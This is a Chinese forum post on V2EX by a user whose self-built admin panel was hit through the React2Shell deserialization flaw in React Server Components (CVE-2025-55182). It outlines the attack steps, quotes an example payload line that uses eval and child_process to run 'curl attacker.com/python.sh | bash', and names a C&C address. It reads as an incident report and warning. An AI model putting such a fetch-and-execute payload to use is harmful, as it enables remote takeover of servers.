V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
dodoa
V2EX  ›  信息安全

中招了 React2Shell 一个影响 React 的严重未经身份验证的远程代码执行漏洞

  •  
  •   dodoa · 7 小时 2 分钟前 · 677 次点击

    React2Shell (CVE-2025-55182)

    前段时间用 CC 写了一个应用的 Web 管理后台并部署在阿里云,结果周末就遭遇了攻击。


    漏洞原理

    React Server Components 的反序列化漏洞:

    • RSC 使用自定义序列化格式在服务器与客户端之间传输数据
    • 服务器会反序列化客户端发送的 RSC payload
    • 漏洞允许攻击者注入特制序列化数据
    • 服务器在反序列化过程中可能执行任意代码

    攻击步骤(概述)

    1. 发现目标

    • 扫描使用 Next.js 或其他 RSC 框架的服务器
    • 识别处理 RSC 请求的端点

    2. 构造恶意 payload

    • 创建特制的 RSC 序列化数据
    • 注入可执行任意代码的片段,例如:
    // 恶意 RSC payload 中可能包含的示例
    eval('require("child_process").exec("curl http://attacker.com/python.sh | bash")')
    

    3. 发送攻击请求

    • 向 RSC 端点发送 POST 请求
    • 携带恶意序列化 payload
    • 无需身份验证

    4. 服务器执行

    • 服务器反序列化 payload
    • 触发代码执行
    • 下载并运行 python.sh

    5. 后门建立

    • python.sh 下载后门程序
    • 后门连接至攻击者 C&C 服务器(如:119.45.243.154:8443
    • 攻击者获取持续访问权限
    1 条回复    2025-12-09 11:07:22 +08:00
    songsongqaq
        1
    songsongqaq  
       5 小时 52 分钟前

    已中招
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   Solana   ·   5204 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 08:59 · PVG 16:59 · LAX 00:59 · JFK 03:59
    ♥ Do have faith in what you're doing.